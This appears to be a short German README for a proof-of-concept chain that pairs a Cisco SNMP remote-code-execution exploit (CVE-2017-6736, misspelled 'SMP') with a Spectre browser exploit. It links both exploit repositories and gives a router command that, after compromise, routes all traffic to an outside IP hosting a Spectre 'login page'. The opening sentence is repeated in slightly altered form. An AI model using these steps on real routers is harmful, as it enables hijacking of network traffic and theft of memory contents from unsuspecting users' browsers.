
Ein PoC-Exploit, der den kürzlich erschienenen Cisco-SMP-Exploit (CVE-2017-6736) nutzt, um zu Spectre (CVE-2017-5753 und CVE-2017-5715) zu verketten.
Eine PoC-Chain-Exploitierung, die den aktuellen Cisco-SMP-Exploit (CVE-2017-6736) nutzt, um in Spectre (CVE-2017-5753 und CVE-2017-5715) zu verketten
Cisco-RCE-Exploit-Submodul von artkond: https://github.com/artkond/cisco-snmp-rce
JS-Spectre-Chrome-POC von ascendr: https://github.com/ascendr/spectre-chrome
Getestet auf einem Cisco 1841+2600 Router.
Nach Ausführung des RCE-Exploits. Als Konfiguration ausführen:
Router(config)> ip route 0.0.0.0 0.0.0.0 195.20.52.49
Dadurch wird der gesamte Datenverkehr durch die von mir erstellte Spectre-Anmeldeseite geleitet. Zu einem späteren Zeitpunkt werde ich eine bessere Version hinzufügen, die das tatsächliche Aufrufen von Websites berücksichtigt.